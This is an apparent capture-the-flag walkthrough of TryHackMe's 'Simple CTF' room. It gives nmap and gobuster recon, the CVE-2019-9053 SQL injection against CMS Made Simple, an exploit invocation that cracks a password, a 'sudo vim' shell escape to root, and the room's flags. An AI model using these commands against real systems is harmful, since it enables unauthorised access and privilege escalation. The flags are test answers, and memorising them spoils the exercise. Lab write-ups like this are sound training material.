Simple CTF

https://tryhackme.com/room/easyctf

INIT

export easyctf=10.10.150.200
ping $easyctf

echo "10.10.150.200 easyctf.thm" >> /etc/hosts

How many services are running under port 1000?

nmap -T5 -p1-1000 easyctf.thm

2

What is running on the higher port?

nmap -sC -sV -T5 -p1-65535 easyctf.thm

ssh

FTP

HTTP

GOBUSTER

gobuster dir -u easyctf.thm -w /usr/share/wordlists/dirb/common.txt -q -t 15 -x php,html,txt

CMS Made Simple 2.2.8

What's the CVE you're using against the application?

CVE-2019-9053

To what kind of vulnerability is the application vulnerable?

sqli

What's the password?

python3 easyctf.py -u http://easyctf.thm/simple --crack -wordlist /usr/share/wordlists/rockyou.txt

secret

Where can you login with the details obtained?

ssh

What's the user flag?

G00d j0b, keep up!

Is there any other user in the home directory? What's its name?

sunbath

What can you leverage to spawn a privileged shell?

sudo vim -c ':!/bin/sh'

vim | GTFOBinsgtfobins.github.io

vim

What's the root flag?

cat /root/root.txt

W3ll d0n3. You made it!